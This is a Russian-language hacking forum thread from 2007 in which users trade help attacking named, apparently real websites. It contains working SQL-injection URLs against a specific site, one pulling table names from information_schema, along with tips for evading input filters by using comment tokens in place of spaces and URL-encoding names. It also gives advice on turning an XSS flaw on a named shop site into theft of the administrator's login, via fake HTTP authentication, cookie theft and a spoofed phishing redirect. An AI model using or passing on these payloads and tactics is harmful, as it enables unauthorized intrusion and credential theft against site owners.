15.10.2007, 22:52
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
С нами:
9881483
Репутация:
569
|
|
Скуля
код:
http://www.wm.lookmy.info/index.php?id=1868&show=news&newsid=-1662+union+select+1,2,3/*
принтабельные поля 2 и 3,но почему-то при запросе version() либо user(),выдает пустую страницу
или тут отсекаются все запросы к бд? Подскажите пожалуйста.
|
|
|
15.10.2007, 23:13
|
|
♠ ♦ ♣ ♥
Регистрация: 18.05.2006
Сообщений: 1,828
С нами:
10516826
Репутация:
3742
|
|
тупо парсятся user() database() version() в гет запросе ))) фром и все остальное не проверяется.
__________________
Привет! Меня зовут Джордж, и я хотел бы рассказать вам про реинкарнацию (ц) 2x2
|
|
|
|
15.10.2007, 23:23
|
|
Участник форума
Регистрация: 02.08.2007
Сообщений: 242
С нами:
9881483
Репутация:
569
|
|
Сообщение от blackybr
тупо парсятся user() database() version() в гет запросе ))) фром и все остальное не проверяется.
Там по моему 5 мускул,так как при запросе information_schema выдается пустая страница,вместо сообщения об ошибке от сервера,значит остается жопный вариант подбирать названия вручную?
|
|
|
|
15.10.2007, 23:41
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
С нами:
10274726
Репутация:
1917
|
|
Сообщение от blackybr
тупо парсятся user() database() version() в гет запросе ))) фром и все остальное не проверяется.
несовсем, там парсятся вобще скобки ()
2fobofob
все работает:
Код:
http://www.wm.lookmy.info/index.php?id=1868&show=news&newsid=-1662+union+select+1,2,table_name%20from%20information_schema.tables/*
ЗЫ на одном хек портале была скуля, так там скобки фильтровались, пробелы (ну и плсенги) надо было /**/ ставить, но самое прикольное что в гет запросе был фильтр на префикс к таблицам форума, например если в гет запросе встречается phpbb_ , то сразу кидает на индекс... и такое бывает
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 16.10.2007 в 00:15..
|
|
|
|
15.10.2007, 23:30
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами:
10188506
Репутация:
861
|
|
fobofob, для вытаскивания колонок из таблицы не нужны user() database() и version()..совсем)) Так что дерзай
|
|
|
|
18.10.2007, 12:08
|
|
Новичок
Регистрация: 03.10.2007
Сообщений: 5
С нами:
9792806
Репутация:
0
|
|
Здравствуйте.
Помогите пожалуйста, такой вопрос:
Есть сайт, вход в админку там через http авторизацию. Так же на сайте есть XSS в поисковике. Каким образом можно отрулить логин и пароль админа ?
вот сайт http://www.butik.ru/
|
|
|
|
18.10.2007, 12:15
|
|
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,187
С нами:
10495046
Репутация:
2642
|
|
Сообщение от m0rf
Здравствуйте.
Помогите пожалуйста, такой вопрос:
Есть сайт, вход в админку там через http авторизацию. Так же на сайте есть XSS в поисковике. Каким образом можно отрулить логин и пароль админа ?
вот сайт http://www.butik.ru/
Попробуй реализовать поддельную HTTP авторизацию через JavaScript и использовать СИ, например сказать, что в админку можно пройти без пароля и дать ему ссылку.
Но если логин и пасс после авторизации сохраняются в кукисы, то можно просто их украсть. А узнать без его помощи вряд ли получится.
|
|
|
|
18.10.2007, 12:15
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
С нами:
10243046
Репутация:
3033
|
|
Сделать фейк, подснуть админу xss-вектор с редиректом на фейк(при этом заюзав урл спуффинг) и надеяться, что когда он попадет на фейк(и попадет ли вообще), то ему страшно захочеться ввести логин и пароль
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
18.10.2007, 16:13
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
Такая ситуация: есть таблица юзеров форума - abc_user. Таблица находится в базе - abc-forum. Когда я пишу скулю
site.com/fname.php?id=-1+union+select+1,username,2+from+abc-forum.abc_user/*
выводиться такая ошибка
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-forum.abc_user/*'
Проблема как я понимаю в тире в имени базы. Подскажите, что делать с этим тире?
|
|
|
|
18.10.2007, 16:19
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
С нами:
10172486
Репутация:
874
|
|
У меня как-то фильтровалось нижнее подчеркивание и точка. Вышел из положения урл кодированием... незнаю как это понимать но факт был. Кодировал название таблицы в урл коды и запрос работал без этого нет.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
